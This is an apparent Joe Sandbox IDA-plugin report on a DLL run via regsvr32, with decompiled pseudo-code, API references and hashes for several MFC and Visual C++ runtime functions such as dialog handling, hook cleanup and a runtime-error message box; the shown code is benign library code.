0x1002bdbd
0x1002bd20
0x1002bd20
0x1002bd28
0x1002bd94
0x1002bd99
0x1002bd2a
0x1002bd2a
0x1002bd33
0x1002bd50
0x1002bd50
0x1002bd35
0x1002bd42
0x1002bd44
0x1002bd4c
0x1002bd4e
0x00000000
0x00000000
0x1002bd4e
0x1002bd58
0x1002bd69
0x1002bd6f
0x1002bd74
0x1002bd80
0x1002bd85
0x1002bd85
0x1002bd74
0x1002bd28
0x1002bd1e
0x1002bdfc
0x1002bdfc
0x1002be04
0x1002be1b
0x1002bc92
0x1002bc92
0x1002bc94
0x1002bc9a
0x1002bc9c
0x1002bca1
0x1002bca5
0x1002bca8
0x1002bca9
0x1002bcaf
0x00000000
0x00000000
0x1002bcb1
0x1002bcbf
0x1002bcbf
0x00000000
0x1002bcbf
0x1002bcb3
0x1002bcb9
0x00000000
0x1002bcb9
0x1002bcc5
0x1002bcc5
0x00000000
0x1002bcc7
0x1002bccc
0x1002bcf0
0x1002bcf0
0x1002bcc5

APIs

GetCurrentThreadId.KERNEL32 ref: 1002BC77
EnterCriticalSection.KERNEL32(10096AC0), ref: 1002BC84
LeaveCriticalSection.KERNEL32(10096AC0), ref: 1002BCCC
CallNextHookEx.USER32 ref: 1002BCE3
LeaveCriticalSection.KERNEL32(10096AC0), ref: 1002BCFE
GetWindowLongA.USER32(?,000000F0), ref: 1002BD42
SendMessageA.USER32 ref: 1002BD69
GetParent.USER32(?), ref: 1002BDD1
CallNextHookEx.USER32 ref: 1002BE0E

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$CallHookLeaveNext$CurrentEnterLongMessageParentSendThreadWindow
String ID:
API String ID: 1151315845-0
Opcode ID: f1e02dc664fb3d66eaea192f1e0d8c4eece6f7a07dad62ec0f90ba4508ed2143
Instruction ID: b2bc3eccceca7d6915c1590a62fa1c1158ec8d56eed07b5d7584259970e2be93
Opcode Fuzzy Hash: f1e02dc664fb3d66eaea192f1e0d8c4eece6f7a07dad62ec0f90ba4508ed2143
Instruction Fuzzy Hash: 0C411971A05B169FE304DF14EC85FAA77B8FF48354F84441AF95A83261EB31E948CB62

Uniqueness

Uniqueness Score: -1.00%

Function 10041659 Relevance: 13.6, APIs: 9, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E10041659(intOrPtr* __ecx) {
				void* __esi;
				signed int _t40;
				struct HWND__* _t45;
				signed int _t49;
				signed char _t54;
				struct HWND__* _t56;
				struct HINSTANCE__* _t61;
				void* _t63;
				void* _t74;
				intOrPtr* _t78;
				void* _t80;
				void* _t82;

				E1001A9E0(0x10076508, _t80);
				_t78 = __ecx;
				 *((intOrPtr*)(_t80 - 0x10)) = _t82 - 0x18;
				 *((intOrPtr*)(_t80 - 0x1c)) = __ecx;
				_t74 =  *(__ecx + 0x44);
				 *(_t80 - 0x18) =  *(__ecx + 0x48);
				_t40 = E10064B8B();
				_t61 =  *(_t40 + 0xc);
				if( *(_t78 + 0x40) != 0) {
					_t61 =  *(E10064B8B() + 0xc);
					_t40 = LoadResource(_t61, FindResourceA(_t61,  *(_t78 + 0x40), 5));
					_t74 = _t40;
				}
				if(_t74 != 0) {
					_t40 = LockResource(_t74);
					 *(_t80 - 0x18) = _t40;
				}
				if( *(_t80 - 0x18) != 0) {
					 *(_t80 - 0x14) = E100415DD(_t78);
					E10042477();
					__eflags =  *(_t80 - 0x14);
					 *(_t80 - 0x20) = 0;
					if( *(_t80 - 0x14) != 0) {
						_t56 = IsWindowEnabled( *(_t80 - 0x14));
						__eflags = _t56;
						if(_t56 != 0) {
							EnableWindow( *(_t80 - 0x14), 0);
							 *(_t80 - 0x20) = 1;
						}
					}
					_push(_t78);
					 *(_t80 - 4) = 0;
					E1004242B();
					_t45 = E100412ED(_t78,  *(_t80 - 0x18), E10041F78(_t80,  *(_t80 - 0x14)), _t61);
					__eflags = _t45;
					if(_t45 != 0) {
						__eflags =  *(_t78 + 0x24) & 0x00000010;
						if(( *(_t78 + 0x24) & 0x00000010) != 0) {
							_t63 = 4;
							_t54 = E100452DE(_t78);
							__eflags = _t54 & 0x00000001;
							if((_t54 & 0x00000001) != 0) {
								_t63 = 5;
							}
							_push(_t63);
							E100449C8(_t78);
						}
						__eflags =  *(_t78 + 0x1c);
						if( *(_t78 + 0x1c) != 0) {
							E1004546A(_t78, 0, 0, 0, 0, 0, 0x97);
						}
					}
					 *(_t80 - 4) =  *(_t80 - 4) | 0xffffffff;
					__eflags =  *(_t80 - 0x20);
					if( *(_t80 - 0x20) != 0) {
						EnableWindow( *(_t80 - 0x14), 1);
					}
					__eflags =  *(_t80 - 0x14);
					if(__eflags != 0) {
						__eflags = GetActiveWindow() -  *(_t78 + 0x1c);
						if(__eflags == 0) {
							SetActiveWindow( *(_t80 - 0x14));
						}
					}
					 *((intOrPtr*)( *_t78 + 0x58))();
					E10041617(_t78, _t78, __eflags);
					_t49 =  *(_t78 + 0x2c);
				} else {
					_t49 = _t40 | 0xffffffff;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t80 - 0xc));
				return _t49;
			}

0x1004165e
0x10041668
0x1004166b
0x1004166e
0x10041674
0x10041677
0x1004167a
0x10041683
0x10041686
0x1004168d
0x1004169e
0x100416a4
0x100416a4
0x100416a8
0x100416ab
0x100416b1
0x100416b1
0x100416b8
0x100416c9
0x100416cc
0x100416d3
0x100416d6
0x100416d9
0x100416de
0x100416e4
0x100416e6
0x100416ec
0x100416f2
0x100416f2
0x100416e6
0x100416f9
0x100416fa
0x100416fd
0x10041711
0x10041716
0x10041718
0x1004171a
0x1004171e
0x10041724
0x10041725
0x1004172a
0x1004172d
0x10041731
0x10041731
0x10041732
0x10041735
0x10041735
0x1004173a
0x1004173d
0x1004174b
0x1004174b
0x1004173d
0x1004176c
0x10041770
0x10041773
0x1004177a
0x1004177a
0x10041780
0x10041783
0x1004178b
0x1004178e
0x10041793
0x10041793
0x1004178e
0x1004179d
0x100417a2
0x100417a7
0x100416ba
0x100416ba
0x100416ba
0x100417af
0x100417b8

APIs

__EH_prolog.LIBCMT ref: 1004165E
FindResourceA.KERNEL32 ref: 10041696
LoadResource.KERNEL32(?,00000000), ref: 1004169E

Part of subcall function 10042477: UnhookWindowsHookEx.USER32 ref: 1004249C

LockResource.KERNEL32(?), ref: 100416AB
IsWindowEnabled.USER32(?), ref: 100416DE
EnableWindow.USER32(?,00000000), ref: 100416EC
EnableWindow.USER32(?,00000001), ref: 1004177A
GetActiveWindow.USER32 ref: 10041785
SetActiveWindow.USER32(?), ref: 10041793

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Resource$ActiveEnable$EnabledFindH_prologHookLoadLockUnhookWindows
String ID:
API String ID: 401145483-0
Opcode ID: c19dfc6395e17b7d685b5758bd4c9d3a6fc294ca6a61339f898f1ce83f3bba97
Instruction ID: 4fa591947d8fa77df22f69d6dd76be97582fe9a008d6bae8eb37a65fd3734509
Opcode Fuzzy Hash: c19dfc6395e17b7d685b5758bd4c9d3a6fc294ca6a61339f898f1ce83f3bba97
Instruction Fuzzy Hash: AD41D234A00A16DFDB11DB64C889BAEBBF5FF84751F31012AF402E2291CB759D41CB99

Uniqueness

Uniqueness Score: -1.00%

Function 100375CF Relevance: 13.6, APIs: 9, Instructions: 80
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E100375CF(void* __ebx) {
				int _v4;
				struct HWND__* _v8;
				void* __ecx;
				void* __esi;
				struct HWND__* _t28;
				int _t32;
				int _t33;
				int _t35;
				void* _t36;
				void* _t41;
				void* _t42;
				signed int _t44;
				signed int _t53;

				_t41 = __ebx;
				_t53 = _t44;
				E1001AB60(lstrlenA( *(_t53 + 0x78)) + 1 +  *(_t53 + 0x78), 0,  *((intOrPtr*)(_t53 + 0x7c)) - lstrlenA( *(_t53 + 0x78)) + 1);
				_v8 = GetFocus();
				 *(_t53 + 0x60) = E100415DD(_t53);
				E10042477();
				_t28 =  *(_t53 + 0x60);
				if(_t28 != 0 && IsWindowEnabled(_t28) != 0) {
					_push(1);
					_pop(0);
					EnableWindow( *(_t53 + 0x60), 0);
				}
				_push(_t41);
				_t42 = E100648FB();
				if(( *(_t53 + 0x92) & 0x00000008) == 0) {
					_push(_t53);
					E1004242B();
				} else {
					 *(_t42 + 0x18) = _t53;
				}
				_push(_t53 + 0x5c);
				if( *((intOrPtr*)(_t53 + 0xa8)) == 0) {
					_t32 = GetSaveFileNameA();
				} else {
					_t32 = GetOpenFileNameA();
				}
				 *(_t42 + 0x18) =  *(_t42 + 0x18) & 0x00000000;
				_v4 = _t32;
				if(0 != 0) {
					EnableWindow( *(_t53 + 0x60), 1);
				}
				_t33 = IsWindow(_v8);
				_t65 = _t33;
				if(_t33 != 0) {
					SetFocus(_v8);
				}
				E10041617(_t53, _t53, _t65);
				_t35 = _v4;
				if(_t35 == 0) {
					_t36 = 2;
					return _t36;
				}
				return _t35;
			}

0x100375cf
0x100375d3
0x100375ec
0x100375fc
0x10037607
0x1003760a
0x1003760f
0x1003761a
0x10037627
0x10037629
0x1003762f
0x1003762f
0x10037631
0x1003763e
0x10037640
0x10037647
0x10037648
0x10037642
0x10037642
0x10037642
0x10037657
0x10037658
0x10037661
0x1003765a
0x1003765a
0x1003765a
0x10037666
0x1003766a
0x10037671
0x10037678
0x10037678
0x1003767e
0x10037684
0x10037686
0x1003768c
0x1003768c
0x10037694
0x10037699
0x100376a2
0x100376a6
0x00000000
0x100376a6
0x100376a9

APIs

lstrlenA.KERNEL32(?), ref: 100375D9
GetFocus.USER32 ref: 100375F4

Part of subcall function 10042477: UnhookWindowsHookEx.USER32 ref: 1004249C

IsWindowEnabled.USER32(?), ref: 1003761D
EnableWindow.USER32(?,00000000), ref: 1003762F
GetOpenFileNameA.COMDLG32(?), ref: 1003765A
GetSaveFileNameA.COMDLG32(?), ref: 10037661
EnableWindow.USER32(?,00000001), ref: 10037678
IsWindow.USER32(00000000), ref: 1003767E
SetFocus.USER32 ref: 1003768C

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$EnableFileFocusName$EnabledHookOpenSaveUnhookWindowslstrlen
String ID:
API String ID: 3606897497-0
Opcode ID: bb18a99f1375e6fefd5f7ff3a3317f5c7153ede4c81640aabf191f15619b74bb
Instruction ID: 9424c969a7d488aac9fbc52c3d561a5d9c3998f1d874a5bd58c52da5dcad5712
Opcode Fuzzy Hash: bb18a99f1375e6fefd5f7ff3a3317f5c7153ede4c81640aabf191f15619b74bb
Instruction Fuzzy Hash: B921BC35200B01AFEB26DB79CC86B5B3BE4FB84351F11442EF59A86291DB71E800CB55

Uniqueness

Uniqueness Score: -1.00%

Function 1002B690 Relevance: 13.6, APIs: 9, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1002B690() {
				intOrPtr* _t1;
				short _t2;
				int _t3;
				int _t4;
				int _t5;
				int _t6;
				int _t7;
				int _t8;
				int _t9;

				EnterCriticalSection(0x10096ac0);
				_t1 = 0x10097780;
				do {
					if( *_t1 != 0) {
						 *_t1 = 0;
					}
					_t1 = _t1 + 0x18;
				} while (_t1 < 0x10097810);
				_t2 = E1002A610();
				if( *0x10096d28 != 0) {
					_t9 =  *0x10096d28; // 0x0
					_t2 = GlobalDeleteAtom(_t9);
				}
				if( *0x10096d2e != 0) {
					_t8 =  *0x10096d2e; // 0x0
					_t2 = GlobalDeleteAtom(_t8);
				}
				if( *0x10096d2c != 0) {
					_t7 =  *0x10096d2c; // 0x0
					_t2 = GlobalDeleteAtom(_t7);
				}
				if( *0x10096d2a != 0) {
					_t6 =  *0x10096d2a; // 0x0
					_t2 = GlobalDeleteAtom(_t6);
				}
				if( *0x10096d32 != 0) {
					_t5 =  *0x10096d32; // 0x0
					_t2 = GlobalDeleteAtom(_t5);
				}
				if( *0x10096d30 != 0) {
					_t4 =  *0x10096d30; // 0x0
					_t2 = GlobalDeleteAtom(_t4);
				}
				if( *0x10096d34 != 0) {
					_t3 =  *0x10096d34; // 0x0
					_t2 = GlobalDeleteAtom(_t3);
				}
				 *0x10096d20 = 0;
				LeaveCriticalSection(0x10096ac0);
				return _t2;
			}

0x1002b696
0x1002b69c
0x1002b6a1
0x1002b6a4
0x1002b6a6
0x1002b6a6
0x1002b6ac
0x1002b6af
0x1002b6b6
0x1002b6c3
0x1002b6c5
0x1002b6d2
0x1002b6d2
0x1002b6e4
0x1002b6e6
0x1002b6ed
0x1002b6ed
0x1002b6f7
0x1002b6f9
0x1002b700
0x1002b700
0x1002b70a
0x1002b70c
0x1002b713
0x1002b713
0x1002b71d
0x1002b71f
0x1002b726
0x1002b726
0x1002b730
0x1002b732
0x1002b739
0x1002b739
0x1002b743
0x1002b745
0x1002b74c
0x1002b74c
0x1002b74e
0x1002b75d
0x1002b764

APIs

EnterCriticalSection.KERNEL32(10096AC0,?,1002AA2F), ref: 1002B696
GlobalDeleteAtom.KERNEL32(00000000), ref: 1002B6D2
GlobalDeleteAtom.KERNEL32(00000000), ref: 1002B6ED
GlobalDeleteAtom.KERNEL32(00000000), ref: 1002B700
GlobalDeleteAtom.KERNEL32(00000000), ref: 1002B713
GlobalDeleteAtom.KERNEL32(00000000), ref: 1002B726
GlobalDeleteAtom.KERNEL32(00000000), ref: 1002B739
GlobalDeleteAtom.KERNEL32(00000000), ref: 1002B74C
LeaveCriticalSection.KERNEL32(10096AC0,?,1002AA2F), ref: 1002B75D

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: AtomDeleteGlobal$CriticalSection$EnterLeave
String ID:
API String ID: 3843206905-0
Opcode ID: 67742df324b65e36cf1bf0114a488a9b1297fe329f4955c6dd7bd3c0cb0c49d7
Instruction ID: 46ec323290001c6d3b2dafdd85a1dcdbd9c8833c1201f666b3f0f7d713a68651
Opcode Fuzzy Hash: 67742df324b65e36cf1bf0114a488a9b1297fe329f4955c6dd7bd3c0cb0c49d7
Instruction Fuzzy Hash: 11113D59E06625D5FB49BBA0EC8CA953AB4F74C354F814403E439476A0E7B848C5CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 10021B9B Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 96%

			E10021B9B(void* __edi, long _a4) {
				char _v164;
				char _v424;
				int _t17;
				long _t19;
				signed int _t42;
				long _t47;
				void* _t48;
				signed int _t54;
				void** _t56;
				void* _t57;

				_t48 = __edi;
				_t47 = _a4;
				_t42 = 0;
				_t17 = 0x100911e0;
				while(_t47 !=  *_t17) {
					_t17 = _t17 + 8;
					_t42 = _t42 + 1;
					if(_t17 < 0x10091270) {
						continue;
					}
					break;
				}
				_t54 = _t42 << 3;
				_t2 = _t54 + 0x100911e0; // 0x50000000
				if(_t47 ==  *_t2) {
					_t17 =  *0x10094f48; // 0x0
					if(_t17 == 1 || _t17 == 0 &&  *0x10094f4c == 1) {
						_t16 = _t54 + 0x100911e4; // 0x10080a50
						_t56 = _t16;
						_t19 = E100225A0( *_t56);
						_t17 = WriteFile(GetStdHandle(0xfffffff4),  *_t56, _t19,  &_a4, 0);
					} else {
						if(_t47 != 0xfc) {
							if(GetModuleFileNameA(0,  &_v424, 0x104) == 0) {
								E100228E0( &_v424, "<program name unknown>");
							}
							_push(_t48);
							_t49 =  &_v424;
							if(E100225A0( &_v424) + 1 > 0x3c) {
								_t49 = E100225A0( &_v424) +  &_v424 - 0x3b;
								E10025410(E100225A0( &_v424) +  &_v424 - 0x3b, "...", 3);
								_t57 = _t57 + 0x10;
							}
							E100228E0( &_v164, "Runtime Error!\n\nProgram: ");
							E100228F0( &_v164, _t49);
							E100228F0( &_v164, "\n\n");
							_t12 = _t54 + 0x100911e4; // 0x10080a50
							E100228F0( &_v164,  *_t12);
							_t17 = E10026CBC( &_v164, "Microsoft Visual C++ Runtime Library", 0x12010);
						}
					}
				}
				return _t17;
			}

0x10021b9b
0x10021ba4
0x10021ba7
0x10021ba9
0x10021bae
0x10021bb2
0x10021bb5
0x10021bbb
0x00000000
0x00000000
0x00000000
0x10021bbb
0x10021bc0
0x10021bc3
0x10021bc9
0x10021bcf
0x10021bd7
0x10021cc8
0x10021cc8
0x10021cd3
0x10021ce5
0x10021bee
0x10021bf4
0x10021c10
0x10021c1e
0x10021c24
0x10021c2b
0x10021c2d
0x10021c3d
0x10021c58
0x10021c60
0x10021c65
0x10021c65
0x10021c74
0x10021c81
0x10021c92
0x10021c97
0x10021ca4
0x10021cba
0x10021cc2
0x10021bf4
0x10021bd7
0x10021ced

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 10021C08
GetStdHandle.KERNEL32(000000F4,10080A50,00000000,?,00000000,?), ref: 10021CDE
WriteFile.KERNEL32(00000000), ref: 10021CE5

Strings

Runtime Error!Program: , xrefs: 10021C6E
<program name unknown>, xrefs: 10021C18
..., xrefs: 10021C5A
Microsoft Visual C++ Runtime Library, xrefs: 10021CB4

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: File$HandleModuleNameWrite
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 3784150691-4022980321
Opcode ID: 11c677f568eaddf24e8096f2ffeffc569bd28a954ddb577c416e822fe5343a0a
Instruction ID: 59bd0caf325beab6c46be0fc0adda262f68f105e5ea8a87234ed9661798a06df
Opcode Fuzzy Hash: 11c677f568eaddf24e8096f2ffeffc569bd28a954ddb577c416e822fe5343a0a
Instruction Fuzzy Hash: E731B27AA00218AFEB21DBA0DC85FEA33BCFF55340FE00567F549E6050EB30EA448A51

Uniqueness

Uniqueness Score: -1.00%

Function 10011392 Relevance: 12.3, APIs: 8, Instructions: 297
memoryCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E10011392(intOrPtr __ecx) {
				intOrPtr _t115;
				intOrPtr _t119;
				intOrPtr* _t120;
				intOrPtr* _t122;
				intOrPtr* _t124;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t130;
				long _t133;
				void* _t134;
				intOrPtr _t135;
				intOrPtr _t136;
				long _t137;
				intOrPtr* _t139;
				intOrPtr* _t141;
				void* _t143;
				intOrPtr _t146;
				intOrPtr _t147;
				intOrPtr* _t148;
				void* _t150;
				intOrPtr* _t152;
				intOrPtr* _t157;
				intOrPtr _t158;
				intOrPtr* _t160;
				intOrPtr* _t162;
				void* _t167;
				intOrPtr* _t169;
				intOrPtr* _t171;
				intOrPtr* _t173;
				intOrPtr _t174;
				intOrPtr _t187;
				intOrPtr* _t207;
				intOrPtr* _t220;
				long _t225;
				void* _t227;

				E1001A9E0(0x100774cc, _t227);
				_t220 = __ecx + 0x4c;
				 *((intOrPtr*)(_t227 - 0x24)) = __ecx;
				_t115 = E10011164(__ecx,  *((intOrPtr*)(_t227 + 8)), 0, 3, 0x10082260, _t220,  *((intOrPtr*)(_t227 + 0x14)));
				 *((intOrPtr*)(_t227 + 0x14)) = _t115;
				if(_t115 < 0) {
					L48:
					 *[fs:0x0] =  *((intOrPtr*)(_t227 - 0xc));
					return _t115;
				}
